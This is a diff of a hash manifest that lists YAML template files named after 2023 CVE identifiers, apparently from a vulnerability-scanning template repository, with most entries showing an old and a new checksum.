-http/cves/2023/CVE-2023-22515.yaml:7811582f649c5efef338ffa8fc7d123feb7b66e4 -http/cves/2023/CVE-2023-22518.yaml:c224fc98b21c3bf8e4b3737b6e083c88856fd9a8 +http/cves/2023/CVE-2023-1454.yaml:0d13a7e69773c787ef10021c649a00c24084352f +http/cves/2023/CVE-2023-1496.yaml:d241ddb64b34633745d5303c1fd1c65014966fb2 +http/cves/2023/CVE-2023-1546.yaml:4fb03fe7dd63f6385445731a2f79080a0ff1b859 +http/cves/2023/CVE-2023-1671.yaml:9ecc7cb6c6977775d98a5dc5c33dbfc3eb852c7e +http/cves/2023/CVE-2023-1698.yaml:7014dcc0ce750cc2750308ff4042c267e072d39b +http/cves/2023/CVE-2023-1730.yaml:d08e8d3912c87e986b5e82f52ba0d2a0698b2c56 +http/cves/2023/CVE-2023-1780.yaml:738e0b661a985bb5ed7ab5f7906c785b17d441c4 +http/cves/2023/CVE-2023-1835.yaml:f113c83a7296f2f2e5e0ed64cdbc0f873baec1d3 +http/cves/2023/CVE-2023-1880.yaml:9b586d24b635725555c69340b5c79962aeaaf3d4 +http/cves/2023/CVE-2023-1890.yaml:9b2ddcabcd7f6100fb79a65a551b5b56f605e700 +http/cves/2023/CVE-2023-20073.yaml:ed12fd4c43cce4bf6bb1d7684be518ee13399d78 +http/cves/2023/CVE-2023-2009.yaml:14b3c7af5ca9d42bceecde41b0fbe8d70ae9ce25 +http/cves/2023/CVE-2023-20198.yaml:7ecc5f5bedac073679250c47a7c42c5ac70fff23 +http/cves/2023/CVE-2023-2023.yaml:a406a1b96f0d972134eb7622b0bb4ca3a3501e61 +http/cves/2023/CVE-2023-20864.yaml:f3c6abf111fe41c45d12158a1cbbc35c6925a5ef +http/cves/2023/CVE-2023-20887.yaml:420b0aee0848875c7ebe0b3a4f6f8bf854fd462c +http/cves/2023/CVE-2023-20888.yaml:039e46646c875643497cf1921458de8c7ae4b1bb +http/cves/2023/CVE-2023-20889.yaml:0fbc7b44f01bd5fd1c33048e39a498af242a96e2 +http/cves/2023/CVE-2023-2122.yaml:5926b2c2001cc40b5ef1f1b5469e47616b377bc9 +http/cves/2023/CVE-2023-2130.yaml:6ad20ab8923c5f88eff168d30064c4cbb9a761d3 +http/cves/2023/CVE-2023-2178.yaml:b90ff2220b11f1f2092b83f1da3ce6b0c7955dbb +http/cves/2023/CVE-2023-2224.yaml:8c6bec14ed0a6f2575ed0dc73ab202ed5f42e556 +http/cves/2023/CVE-2023-22432.yaml:bec2e11fec7371e77ed84fb28f8cd11618107896 +http/cves/2023/CVE-2023-22463.yaml:448ca74bc9e4cd19b34c5736305e6f86ca3fe6f7 +http/cves/2023/CVE-2023-22478.yaml:633745da585a588b32abafb22fce0dbe1f2726f7 +http/cves/2023/CVE-2023-22480.yaml:ef6077b21c696a5ebe26f5d8a0a43eea8dedaf22 +http/cves/2023/CVE-2023-22515.yaml:54dcd724a6286a6317b0cbbc8df9a66a207e76fe +http/cves/2023/CVE-2023-22518.yaml:f2a1ddfabd7909de16dc1341fdc9f5f610e61762 http/cves/2023/CVE-2023-2252.yaml:bb02189bc936b107119e8db698983075c295bb78 -http/cves/2023/CVE-2023-22620.yaml:d17b60c3caac0cf4bee31e6d9700899a1c8a41a2 -http/cves/2023/CVE-2023-2272.yaml:8273092cf0ee581de5f8b05df388aa571c7e5f1d -http/cves/2023/CVE-2023-22897.yaml:58c75e592db2abefd86952dacbe406f9c5b6ed1c -http/cves/2023/CVE-2023-23161.yaml:d2bb5b1b5648f46e5b95f37cc0aab29bf2738cd8 -http/cves/2023/CVE-2023-23333.yaml:aa224511ed4cd822f3beb30cf65fc03084b8862a -http/cves/2023/CVE-2023-23488.yaml:f21e90abbf62e8a4122dbb03db509c59b565b2ca +http/cves/2023/CVE-2023-22620.yaml:9cffdee4f2661c3058186240b30ce86d8c54c1d6 +http/cves/2023/CVE-2023-2272.yaml:42b7732c0451d7e4ee034bb370b41b56f9e5a70f +http/cves/2023/CVE-2023-22897.yaml:cef98f91a3a054f36fcc3c07076d48f8bc580595 +http/cves/2023/CVE-2023-23161.yaml:5d472a931ba5be9e89c24cc55516854f870e31d0 +http/cves/2023/CVE-2023-23333.yaml:ecaf83af240ddd3d51a26b1dda5ae02da7d2c3a1 +http/cves/2023/CVE-2023-23488.yaml:f1b6327643e707f15589f1225d1195129a97469c http/cves/2023/CVE-2023-23489.yaml:ec3a79481484e373fe324d9c8f356afb7f1d7f4e -http/cves/2023/CVE-2023-23491.yaml:4f81154ef9db650e769581e2d53e759557a03518 -http/cves/2023/CVE-2023-23492.yaml:ee4f829890fd5ef9e22febcb327fd3eee8833fcd -http/cves/2023/CVE-2023-2356.yaml:a01b2bb95e7866efe4690380b1568772b82048ea -http/cves/2023/CVE-2023-23752.yaml:261a062fd3fdf9e5f0e72a5362b400087317df50 -http/cves/2023/CVE-2023-24044.yaml:366c35dacb84f13fe57cd9c4c0811836e3c8995d -http/cves/2023/CVE-2023-24243.yaml:252b3d79f70eda6f2a866f8f62a900277235cc8b -http/cves/2023/CVE-2023-24278.yaml:e6e598d2ad6867adb3390e74a8018b5dc00f6fba -http/cves/2023/CVE-2023-24322.yaml:443d3fa7254b8d8d33ab7050dd64fa92a84ebd48 +http/cves/2023/CVE-2023-23491.yaml:9eea89cd8e849402796f7d4ccd5afcc8e302f28e +http/cves/2023/CVE-2023-23492.yaml:a74f79ff1e43b0ea9c46764c6d0eb172ae3fd7eb +http/cves/2023/CVE-2023-2356.yaml:336ff67b23959aeb4c8dc5ecd76e24109fc83f7a +http/cves/2023/CVE-2023-23752.yaml:148968158e37efa40bf53512d79bce6336850939 +http/cves/2023/CVE-2023-24044.yaml:4bf6a49d4a491a63167e92b17c3e600431479db3 +http/cves/2023/CVE-2023-24243.yaml:d81831489f0a7caee3d940d8fe28af659f9471a6 +http/cves/2023/CVE-2023-24278.yaml:68a22379a74f6c31cac800917e9e56d429695d16 +http/cves/2023/CVE-2023-24322.yaml:a7fcbb6bc729cdcbf5e5d075a9d1bf30cf03f9a6 http/cves/2023/CVE-2023-24367.yaml:00eec3f3fabe9bd20f29ec7c09425ba7d6223c2c -http/cves/2023/CVE-2023-24488.yaml:240cd53e960e98ac14d6b4388c15e62ad135d2b9 -http/cves/2023/CVE-2023-24489.yaml:d1c56ef3cc02ede0637997fad405981f5e40a132 -http/cves/2023/CVE-2023-24657.yaml:5a7d3130883b877b563344f4798bf540742349bd -http/cves/2023/CVE-2023-24733.yaml:758b791bc79dff266609e40772334421897c4ea5 -http/cves/2023/CVE-2023-24735.yaml:76836456d91006ffb891f6583e07e57c4182bb6a -http/cves/2023/CVE-2023-24737.yaml:e662f63c0d30e6af027b361e02099eb29453732e +http/cves/2023/CVE-2023-24488.yaml:af8aa03f843badbfa03ed376e704ef3d3d979cfa +http/cves/2023/CVE-2023-24489.yaml:9e2feddf720d1c3c6882de07be36d530069084ca +http/cves/2023/CVE-2023-24657.yaml:6cce7d1843b5e71b90c9ffdad5b06ddc7ec23ab7 +http/cves/2023/CVE-2023-24733.yaml:647876ab9cf5ac4a569af64078632d83525d9344 +http/cves/2023/CVE-2023-24735.yaml:5d558c9bf5abe0e71ca32538a2093c17f4da6433 +http/cves/2023/CVE-2023-24737.yaml:66aaf802b9030743802f5f8582a11f847b7ed219 http/cves/2023/CVE-2023-2479.yaml:f390e7f8a4eaee786b3eb5c81759e820b9065d55 -http/cves/2023/CVE-2023-25135.yaml:7bd00eb19ffaa092a5647bde865bf3a081463ea6 -http/cves/2023/CVE-2023-25157.yaml:5d5e5e6c91b7eb87066b0f6213bebf6f632f1ac6 -http/cves/2023/CVE-2023-25346.yaml:1e1b9975644851f3d385997b8c6c4bd1bdcb37fd -http/cves/2023/CVE-2023-25573.yaml:2b3f103de3200ee10b6589a033cdf7c38faa101a -http/cves/2023/CVE-2023-25717.yaml:63247d962d6bbd6b43ee06265c13cb6bce6bb658 -http/cves/2023/CVE-2023-26067.yaml:451d84cbab3ec359e458637ea0590cbbc02f94b6 -http/cves/2023/CVE-2023-26255.yaml:99316c78ee22291fce0de2bb739f499d1bf98116 -http/cves/2023/CVE-2023-26256.yaml:06b78ea04fc6762225a9d01a823196e532abc091 -http/cves/2023/CVE-2023-26360.yaml:ad4e3a5a6e5bd64740457d0d7696ff205aa95896 +http/cves/2023/CVE-2023-25135.yaml:0c0586640d64999031816fb69dac3c27ee5359e1 +http/cves/2023/CVE-2023-25157.yaml:cae73e01a0ca99940f8d63fe6a19b8d93a0f559b +http/cves/2023/CVE-2023-25346.yaml:8b68d246e691a6cabf72139d4f7a347bc2b95462 +http/cves/2023/CVE-2023-25573.yaml:28692480a478de507ac7373b114e60228ccb7929 +http/cves/2023/CVE-2023-25717.yaml:7e22a30b85396eb430a6d22601661461be793e30 +http/cves/2023/CVE-2023-26067.yaml:9e70b9caa7d6025f6a7357e54b3af0bb577735b4 +http/cves/2023/CVE-2023-26255.yaml:cef7d976974297e865b07b78d488c149f12f9b8d +http/cves/2023/CVE-2023-26256.yaml:110dee4d4d553557404104ce65fd6dabff84663c +http/cves/2023/CVE-2023-26360.yaml:73a5ac71a9970d602290ba2f4bc38dec135e5568 http/cves/2023/CVE-2023-26469.yaml:7907b31bfd1d0b500fd39cc897387a0960a518cc -http/cves/2023/CVE-2023-2648.yaml:5b3457a8c130056c4d034db90c0a5a16a43b37ea -http/cves/2023/CVE-2023-26842.yaml:a172dbf88cf2833b1070e171e9121525f49bb9eb -http/cves/2023/CVE-2023-26843.yaml:cd11b7e7a4e023b1ec18935b2214a8d9237afd91 -http/cves/2023/CVE-2023-27008.yaml:4088163ecb258c687e45ef65fa60ba26639f8a5a -http/cves/2023/CVE-2023-27034.yaml:d1edae3bc8b3eda782e82967aafc6a06124b40ea -http/cves/2023/CVE-2023-27159.yaml:007de2a3f5566de6da99d1360c21f0754c3c272a -http/cves/2023/CVE-2023-27179.yaml:20f81f89ce31cf105731438a4d7d2b0558b73714 -http/cves/2023/CVE-2023-27292.yaml:7205df864818c26fcf1505525d419f1be7bea05f -http/cves/2023/CVE-2023-2732.yaml:9c42efe23a72ab20aa68c56f3036ac71a8fd8099 +http/cves/2023/CVE-2023-2648.yaml:e7cb44b9a8760d6655f36ba99ac6914c820e03ab +http/cves/2023/CVE-2023-26842.yaml:40bd938d22d3b1bdda2f1c53ec6540902ea89925 +http/cves/2023/CVE-2023-26843.yaml:3746cce219def56bfe0d69bcf7a5712abedee8eb +http/cves/2023/CVE-2023-27008.yaml:9fe9ba5259658ab4ee28d0737f1fea1254270e18 +http/cves/2023/CVE-2023-27034.yaml:cf7ff718f6a106232b51bccaf298caa9bbc9a2f7 +http/cves/2023/CVE-2023-27159.yaml:694d5e1f361b9fbebc33829e349c2fd7cf5a3bec +http/cves/2023/CVE-2023-27179.yaml:505a7db1eae01bfeb679b249666913cb3ee78064 +http/cves/2023/CVE-2023-27292.yaml:eb0bf213a9fbf951c100652c483f0639b24bebab +http/cves/2023/CVE-2023-2732.yaml:353538970e4cb2115c969bb142a4a92329368f0a http/cves/2023/CVE-2023-27350.yaml:1943b6badb2a9494fde30e6a6a0ec1eb31781d86 -http/cves/2023/CVE-2023-27372.yaml:82e2f9726d6b9580952260cfaf35cdb6bd9d2763 -http/cves/2023/CVE-2023-27482.yaml:e3768f8ba681184a194d01fe8757199acfa111ea -http/cves/2023/CVE-2023-27524.yaml:a8a3f9b90ccbc7f7b810d3ddc1b91f6f20389109 -http/cves/2023/CVE-2023-27587.yaml:9940ba9ccacaf6b8d731e1af299c5540f8a800a5 -http/cves/2023/CVE-2023-2766.yaml:9493e22105e92ebe3f5cae60a6ff256c18c42f3f -http/cves/2023/CVE-2023-2779.yaml:24cbd6ffd6b3ca142332ba0907d59eb7128a9ed1 -http/cves/2023/CVE-2023-2780.yaml:4ad3b303a0d2292d071bed33d0b7df92e1fed233 -http/cves/2023/CVE-2023-27922.yaml:1c625a70a6fa8be9fc4986fa5921295531a3c974 -http/cves/2023/CVE-2023-2796.yaml:f2e866ab16a4aefc62c3556965e3970d21beb2c3 -http/cves/2023/CVE-2023-28121.yaml:5864fbab64474132ba6faf5170a6b6e8feac44c8 -http/cves/2023/CVE-2023-2813.yaml:6f3840ae235ea8a6058e15e07355225d1c248154 -http/cves/2023/CVE-2023-2822.yaml:ea514ea4764045cc604967b06da9fc3e113cdcbd -http/cves/2023/CVE-2023-2825.yaml:714acef50c096d23650d594f9e913548f5fdfca7 -http/cves/2023/CVE-2023-28343.yaml:3bd956a8d4b98ec90b33adf66827747e0fb5efeb -http/cves/2023/CVE-2023-28432.yaml:57d451577dba8d41f948bd705b72e1735d4ded56 -http/cves/2023/CVE-2023-28665.yaml:ab3f742602ff0a2f3a3816f6119ee93b934f3e93 +http/cves/2023/CVE-2023-27372.yaml:29ce21eef31607cdb7da3d5468827d286b245b8f +http/cves/2023/CVE-2023-27482.yaml:02319e639c6f520d4f640aab6ff9570a0bae3af1 +http/cves/2023/CVE-2023-27524.yaml:ad8445339ec5abe4d0ef62baf94eee32a05cd52a +http/cves/2023/CVE-2023-27587.yaml:414d3ccf4aff9e863ec051a97fcb464254c3699a +http/cves/2023/CVE-2023-2766.yaml:9807723124bcb93ae957130c76bf04aef203497c +http/cves/2023/CVE-2023-2779.yaml:dde0af01eede7860f09c52aa63f558c9626f5a08 +http/cves/2023/CVE-2023-2780.yaml:28e667d5488e3472c540eb591d05e32f438cb815 +http/cves/2023/CVE-2023-27922.yaml:d8e0b3e72a3c01eda5fdcf6f9dc2d166f70972a7 +http/cves/2023/CVE-2023-2796.yaml:306015de12810c74c99b18558a62177af96ae4d6 +http/cves/2023/CVE-2023-28121.yaml:7954d9b7ab3eb666dedf0abbf89d8d195794d420 +http/cves/2023/CVE-2023-2813.yaml:b63867bb1b45158913e335a6b07f9a007f2816d3 +http/cves/2023/CVE-2023-2822.yaml:0813f0622da8570de2d15b2b9cce8a6d4f0bd730 +http/cves/2023/CVE-2023-2825.yaml:17daf521198da11fbf14006f8086b2fdd649105e +http/cves/2023/CVE-2023-28343.yaml:42ea42dcefaee828231b7f792e504fc53510122b +http/cves/2023/CVE-2023-28432.yaml:b570824577e1d998cdb7fe07ed709f135ad2ffe2 +http/cves/2023/CVE-2023-28665.yaml:3c05d782bf1c7d1795cfab470142d6157172bda2 http/cves/2023/CVE-2023-29084.yaml:5af292d033e3a19ad04ae1e6cc6473b596cd7cd5 -http/cves/2023/CVE-2023-29298.yaml:1ac6771cc850c7e10452952a5cf494e46c686bbc -http/cves/2023/CVE-2023-29300.yaml:925fbe897ae4f46a1fe276d20cfe1f693074c8fc -http/cves/2023/CVE-2023-29357.yaml:1beabee3dc92d5f319f18f159203335f881a3583 -http/cves/2023/CVE-2023-29439.yaml:dbf0f717082a0bcd00a6eb00e30df8c818cdfb34 -http/cves/2023/CVE-2023-29489.yaml:8e0a18c992bbb58575ac92e692e4858edc60b422 -http/cves/2023/CVE-2023-29622.yaml:84d3c62779e745b3ecfdbff5040ced2330cc12ae -http/cves/2023/CVE-2023-29623.yaml:4bb9d289e6ea6b00969f66869733514ed934d482 -http/cves/2023/CVE-2023-2982.yaml:91dbabf629a852866cba7ff7babfc9144da0f811 -http/cves/2023/CVE-2023-29887.yaml:36c259f265485e6f08c1d0943fc2b3a56727c175 -http/cves/2023/CVE-2023-29919.yaml:6b7d09af8e020dce1d4a3da248bce2060a40113d -http/cves/2023/CVE-2023-29922.yaml:3db1efb243e52e5c5774fc72b0aa09be85c318cb -http/cves/2023/CVE-2023-29923.yaml:79cd2a1569d3ae22aff910c6cc0362a104fff0cb -http/cves/2023/CVE-2023-30013.yaml:ff1eb54ed9b44cb9a3b273ead4ca6ae154dc51a9 -http/cves/2023/CVE-2023-30019.yaml:60224737032ee3bcd9ca206bac4280f36bb711f9 -http/cves/2023/CVE-2023-30150.yaml:8d1b6e8be98c68f2cc34a675e530ab97c332828d -http/cves/2023/CVE-2023-30210.yaml:6a17a7992d2869cd718b2b0aa2c0595250c7a8e7 -http/cves/2023/CVE-2023-30212.yaml:f867aafc0d7c6a5ae58bf574e6278dc425e5c208 -http/cves/2023/CVE-2023-30256.yaml:6cf18ffe0057f05c79b00060b80954967f0b7e39 -http/cves/2023/CVE-2023-30625.yaml:36b31a104ab02e5614ecbad7703469c6b020dd1b -http/cves/2023/CVE-2023-30777.yaml:d7f7de4fb2ea5004a7277eb75e4193c85572efc5 -http/cves/2023/CVE-2023-30868.yaml:bec4a7bebb2852d295130d4ae50b50d64280bb27 -http/cves/2023/CVE-2023-30943.yaml:104e391c97993e6d2a826b4b867269fbc43fa7f0 -http/cves/2023/CVE-2023-31059.yaml:cc2e53e28887558010c9501f78238cc06dded05a -http/cves/2023/CVE-2023-31465.yaml:331ae233829a81695fc72c0b976bb6657e02642d -http/cves/2023/CVE-2023-31548.yaml:5626ada2021e474dc1f5a593e86e2e8772d45238 +http/cves/2023/CVE-2023-29298.yaml:d9a4e574bdeb0e13631d8cc2cb81829a59296094 +http/cves/2023/CVE-2023-29300.yaml:0b2a24dd73eb6c2d367ef07a6c2dd0ee71d7fbd0 +http/cves/2023/CVE-2023-29357.yaml:f7311c3b98a8c5060facd7d4562213f96d8aaecf +http/cves/2023/CVE-2023-29439.yaml:b08107cc6c2ae03a5f989967b27c3874b406e4cb +http/cves/2023/CVE-2023-29489.yaml:2ef0ff57ec78247a9928cf26db1182b448e7b910 +http/cves/2023/CVE-2023-29622.yaml:e33884563025cc84d77030f2e15a3269d5eae5d2 +http/cves/2023/CVE-2023-29623.yaml:031c687754d21cfa2189da79e9a22b46d21e8b9d +http/cves/2023/CVE-2023-2982.yaml:6f9e8db73e51d60009476032f3cb27bd0ec6010d +http/cves/2023/CVE-2023-29887.yaml:000979dee117e69f5aecc9191eb4d0def49a5c60 +http/cves/2023/CVE-2023-29919.yaml:6b7764786a6620ec0d8c2256efc6852d9f2182df +http/cves/2023/CVE-2023-29922.yaml:4be4a7945412432a419e4fb79c17fb2524e9c924 +http/cves/2023/CVE-2023-29923.yaml:fdad78fa38a7ca38e83f1ca007b76df50682a11f +http/cves/2023/CVE-2023-30013.yaml:8182bae8998c4176d6e7f304237df1f6372d6055 +http/cves/2023/CVE-2023-30019.yaml:02484c95272de5cb1aa497d2d417f2e7d56497bc +http/cves/2023/CVE-2023-30150.yaml:947f9374ecb2fd360b4205bd799ff64e63dcff8e +http/cves/2023/CVE-2023-30210.yaml:3b25f1103299bad78170dadf1cc7648b4bc4bf8c +http/cves/2023/CVE-2023-30212.yaml:e6af4a4b026cb828b10e7719fd149250e752d282 +http/cves/2023/CVE-2023-30256.yaml:98a56e9b43285ed01be1da42a84ae19e4a12da1a +http/cves/2023/CVE-2023-30625.yaml:159a2c1da47b4bbfb33fd6b62dce63fef41a8a92 +http/cves/2023/CVE-2023-30777.yaml:c8836c63b958b8a0529bdadb9142cffc5db42dbd +http/cves/2023/CVE-2023-30868.yaml:1d8a23da714c073d63c4c30f74cccd74405b2438 +http/cves/2023/CVE-2023-30943.yaml:4eb61ab3cd2fb339af7e2b0ca42b084f8feef755 +http/cves/2023/CVE-2023-31059.yaml:34a5d6a5eb6789118ca7bf61ee23ee0fc1eac5ba +http/cves/2023/CVE-2023-31465.yaml:c5b3b224298b439d4f7fd1a8da3e7631552bd3dc +http/cves/2023/CVE-2023-31548.yaml:398d8739fcbf42e2883fcf6b665f84936f0ae818 http/cves/2023/CVE-2023-32117.yaml:d607de0b2e6561a6f63c504cd7a24a9fbedd78e6 -http/cves/2023/CVE-2023-3219.yaml:74e901a5a288120387e093381c8d6b8db5741179 -http/cves/2023/CVE-2023-32235.yaml:fd1c7a2f49c8898c2487f54eed1e18d3ddef571c -http/cves/2023/CVE-2023-32243.yaml:cd0f98f0a55fab559b23601c1e00e66e2455df7b +http/cves/2023/CVE-2023-3219.yaml:4acc63011f97e48fae9664eac92b8545bc4d7b53 +http/cves/2023/CVE-2023-32235.yaml:8aac49c635c7459404506989fb7612b2f9028a7e +http/cves/2023/CVE-2023-32243.yaml:c7ff168d3ae7477cef4f6b52665be142bfb3b596 http/cves/2023/CVE-2023-32315.yaml:3238b39d9d55fbd7acf0be333c6ee9fba4e13f76 -http/cves/2023/CVE-2023-32563.yaml:ff6e9cebefdfc558267b8eb73e2d892b15a3f186 -http/cves/2023/CVE-2023-33338.yaml:cf7f7543fe47f93c50d31319eb5887b727022e3e -http/cves/2023/CVE-2023-33405.yaml:11142d8b917c6c25c24386a2121cc1c4a1a4d0de -http/cves/2023/CVE-2023-33439.yaml:eef3b39f9387afd3ab246a1b4fcdfd09b2aef4ac -http/cves/2023/CVE-2023-33440.yaml:bca1f72460b6a2782f575870bc2fa5e0c25e2da6 -http/cves/2023/CVE-2023-3345.yaml:ee7e66cef0e8cc47194b1d7bcba3a8d698e0efbc -http/cves/2023/CVE-2023-33510.yaml:584783e7e2bcb7fcfcc80ff9c6f69082a8421588 -http/cves/2023/CVE-2023-33568.yaml:1d011ba1da235f3ea8be9e4aecc0bded63880891 -http/cves/2023/CVE-2023-33584.yaml:c4cf1d0936b4e9b27cc588c9fbb095314bbd83e6 -http/cves/2023/CVE-2023-33629.yaml:1baea7ab1ad905bcfc27034c80e7230fbf5bd396 -http/cves/2023/CVE-2023-33831.yaml:80d23fe2ef175f85281e3ece9bc0d80483a71076 -http/cves/2023/CVE-2023-34124.yaml:69062685da0bdae5b2f28b9c223bee8e6875dba8 -http/cves/2023/CVE-2023-34192.yaml:28489dac8688431c2f02197e54b6e93b048b3320 -http/cves/2023/CVE-2023-34259.yaml:48109cfbab8c17c8a68b69b5a1c3880065abf1e0 -http/cves/2023/CVE-2023-34362.yaml:358c4335b5da5c9e566aafb799917cc3223a1388 -http/cves/2023/CVE-2023-34537.yaml:ad4930b1b7e5bb6d19f4685c17a2389e2c76d1fe -http/cves/2023/CVE-2023-34598.yaml:8768ef6596c2fa4a6f65c685d0d4fcca814eece6 -http/cves/2023/CVE-2023-34599.yaml:b360e029c2d5be6bd176d65e48f8f922bd717663 +http/cves/2023/CVE-2023-32563.yaml:a7eb48ba0572c1a8c5cc4ac459c007966ad0c65d +http/cves/2023/CVE-2023-33338.yaml:8d64a68f7a20c175b1ac5cd906a0a2821796e5e8 +http/cves/2023/CVE-2023-33405.yaml:90f1128c213cea4e0f8b3d9dc4cb7d81c7afe40f +http/cves/2023/CVE-2023-33439.yaml:8c5a4622d4b483cb986dc3236734110f1468bdd6 +http/cves/2023/CVE-2023-33440.yaml:d524915c5c64bde3b2ee713749a00d2db6ff3d34 +http/cves/2023/CVE-2023-3345.yaml:d7d7e30ceffd2d9c8d9069e74ad248610087cbc1 +http/cves/2023/CVE-2023-33510.yaml:e55f34f9aafd7e86e5986bc31edd1c73cc1b938d +http/cves/2023/CVE-2023-33568.yaml:b0fea05f887aab025f3e11aed028e0ea35e93fa8 +http/cves/2023/CVE-2023-33584.yaml:b5b9f3cb92a955113e74b78efb91f173cf388a6b +http/cves/2023/CVE-2023-33629.yaml:d629260b753c93e398264eca0ff3ffd1066be134 +http/cves/2023/CVE-2023-33831.yaml:2cb6560df8c2541cfab9a1f50c78d82c6df86880 +http/cves/2023/CVE-2023-34124.yaml:d2953c4414275408e2817dcf83f6ddb0e7d25077 +http/cves/2023/CVE-2023-34192.yaml:df55cbdec390190fd0544a6a5d569813e116bae7 +http/cves/2023/CVE-2023-34259.yaml:627938a91a0871a5d67eaefcbe09af5f2f105e56 +http/cves/2023/CVE-2023-34362.yaml:5299d0f80b5136d314e877eff82d092edccceed8 +http/cves/2023/CVE-2023-34537.yaml:2ce29eab9199c5af693269d3aa0830d7cee3832d +http/cves/2023/CVE-2023-34598.yaml:ba83d73ae8edee4b488e96972bd9c9007be669ba +http/cves/2023/CVE-2023-34599.yaml:1d7b63fb78f7ba4800622715fe702c844e6f3534 http/cves/2023/CVE-2023-3460.yaml:a606f31c7232e06527e6a70e0dcc04f26e6dce56 -http/cves/2023/CVE-2023-34659.yaml:8af4148de578fb03784b37bab540b2cb40a1b537 -http/cves/2023/CVE-2023-34751.yaml:92a018688ef0c78852b07970db86ffd486ac5dd4 -http/cves/2023/CVE-2023-34752.yaml:08df54dbd91f83ba727a78a74cd550d067a04e97 -http/cves/2023/CVE-2023-34753.yaml:83e101fb52a8f9344edecf33f2d0e5b552864b86 -http/cves/2023/CVE-2023-34755.yaml:bd662224feddb1f837d090e7b76237f4a701590b -http/cves/2023/CVE-2023-34756.yaml:ae61767e8947f74c863c7440cfbee0c46c5f7a1f -http/cves/2023/CVE-2023-3479.yaml:3873cd6d6485547bf5cf57d63d8e134442da4f09 -http/cves/2023/CVE-2023-34843.yaml:89e508449fa807b1a92ce2b1972726ce1a1a28f8 -http/cves/2023/CVE-2023-34960.yaml:e31e21c5d4e256b2ec0d3f26cb28e58d87422de9 +http/cves/2023/CVE-2023-34659.yaml:8ea4521a0e1e5424e82897765689cd6ba92e986c +http/cves/2023/CVE-2023-34751.yaml:12248c163b168ab94110e6e4762b9d7865ce6a5b +http/cves/2023/CVE-2023-34752.yaml:53c85e0b19e49977e7871553fb768a8b8e05c6c0 +http/cves/2023/CVE-2023-34753.yaml:0c71291e1f5a9a17216f5e559bbafde89c1c2ade +http/cves/2023/CVE-2023-34755.yaml:0785551c91ea4ac33857e980309d9ccf33586085 +http/cves/2023/CVE-2023-34756.yaml:4c19c82c394f7da46ac35dff6008dc175f906145 +http/cves/2023/CVE-2023-3479.yaml:6e8db3cb2ba1f3265855f60275220cc897c010b0 +http/cves/2023/CVE-2023-34843.yaml:f42986cf17644fd83f1ae1ddfacf9feb8f6d3bed +http/cves/2023/CVE-2023-34960.yaml:2ae3369ff4e3b54409598ebdc322e01ffa38666d http/cves/2023/CVE-2023-35078.yaml:67695cea87583e35f99cef49a4c8afe9fd4daa2c -http/cves/2023/CVE-2023-35082.yaml:54af7d682665b8e15fd0dfefaaa76bc71354cf8e -http/cves/2023/CVE-2023-35813.yaml:ff43f235e2736ec3c95193bfe1e62e114da076eb -http/cves/2023/CVE-2023-35843.yaml:3ae6f9c1809cdd238b98c2fdd3ec1de1c8523207 -http/cves/2023/CVE-2023-35844.yaml:ee2ee616c2e7432fd816284a090343736751fca9 -http/cves/2023/CVE-2023-35885.yaml:7d4ffaf26cf17f66cbe3de8ad243dea37ccaeee5 -http/cves/2023/CVE-2023-36287.yaml:89f6b17f4b771631a2c1a0416b608de76a83d362 -http/cves/2023/CVE-2023-36289.yaml:f38168d77482336507cbc0d0df999539fbdc9d5e -http/cves/2023/CVE-2023-36306.yaml:3a744aa061758155acd1d09bed53611030efd343 -http/cves/2023/CVE-2023-36346.yaml:e125a3f265c2e74ab9dec825141570dc7d1ba3fb -http/cves/2023/CVE-2023-36844.yaml:42c2c0c7383407613abf6fff76e6e3cb4a7d6da2 -http/cves/2023/CVE-2023-36845.yaml:d204f71c173a24bf651db5585c187b1af4cb94f4 -http/cves/2023/CVE-2023-36934.yaml:7e51bae0d88da61b6a80f3b1b36fa44004267b89 -http/cves/2023/CVE-2023-3710.yaml:b9cb017af279423d3e815eb1857176dde6e176d1 -http/cves/2023/CVE-2023-37265.yaml:429d1e696aa73aec36cff163e922642502bab942 -http/cves/2023/CVE-2023-37266.yaml:8a2c91822ff3e43b48d45fa2b21884fc40ce72f6 -http/cves/2023/CVE-2023-37270.yaml:8fd35989139c6652ca9e6736a18c63fb7ce1d5dd -http/cves/2023/CVE-2023-37462.yaml:d1b0650b1dafe9288abd5c1f4869e6295930074b -http/cves/2023/CVE-2023-37474.yaml:d2727e6312d01188095a45714df6b7a96f261503 -http/cves/2023/CVE-2023-37580.yaml:a95fd8b3526b5f045e7026f8e4ccd6bebf02b757 -http/cves/2023/CVE-2023-37629.yaml:c4eab28356ef1ef809745bedc97071125f234886 -http/cves/2023/CVE-2023-3765.yaml:e274f9b2effe02afbbd262e9c762901992519ee0 -http/cves/2023/CVE-2023-37679.yaml:712da1783b06f314061d5b51a9058b1877db3562 -http/cves/2023/CVE-2023-37728.yaml:1092487d583efab70eaa4511b13f3574e4076432 -http/cves/2023/CVE-2023-37979.yaml:de868645c1eef91e7e8f502ccb85cd46a361401e +http/cves/2023/CVE-2023-35082.yaml:21f428d98601e7af065b4d1d729f42a9a6f5f49b +http/cves/2023/CVE-2023-35813.yaml:9dfbf5ad2d62336fd494cfe50f0a23ad9d3aca07 +http/cves/2023/CVE-2023-35843.yaml:f59bebf1b3d2f2ec65f1ba70f2895f97eeafc245 +http/cves/2023/CVE-2023-35844.yaml:bd2c8125cf1377ee8ccfa60f03d1b8eaa77c5ca5 +http/cves/2023/CVE-2023-35885.yaml:aa812f9e2a073adf7d587841720494601c09a2f0 +http/cves/2023/CVE-2023-36287.yaml:fc8653198439e2330afb8e088290d4f330572892 +http/cves/2023/CVE-2023-36289.yaml:94ae2b397ee756d4c6ea99e73a3e58c8442c49c6 +http/cves/2023/CVE-2023-36306.yaml:3d4dc102a23e72660c2fe47d62843625f8423e7b +http/cves/2023/CVE-2023-36346.yaml:fe6d29851d56252fcdbc7f4648770001185aa45f +http/cves/2023/CVE-2023-36844.yaml:210062d306c85a48e3b2d0489ff7381add3c2e39 +http/cves/2023/CVE-2023-36845.yaml:a7a6d382b38ea004f692d26293423b7271bbb45c +http/cves/2023/CVE-2023-36934.yaml:dd7e4c46565050d5531a36b728c327578ed9dcf5 +http/cves/2023/CVE-2023-3710.yaml:bd1bf08accd34152ffdb6841a00866b9bcd6a335 +http/cves/2023/CVE-2023-37265.yaml:e14d6277aaa37f121165649952189b0a9854f6d1 +http/cves/2023/CVE-2023-37266.yaml:5a7a759d2a19922627ed8d2d08450af440913d85 +http/cves/2023/CVE-2023-37270.yaml:61b3ec477bb4145ac589ae4dec8bb5473f9991eb 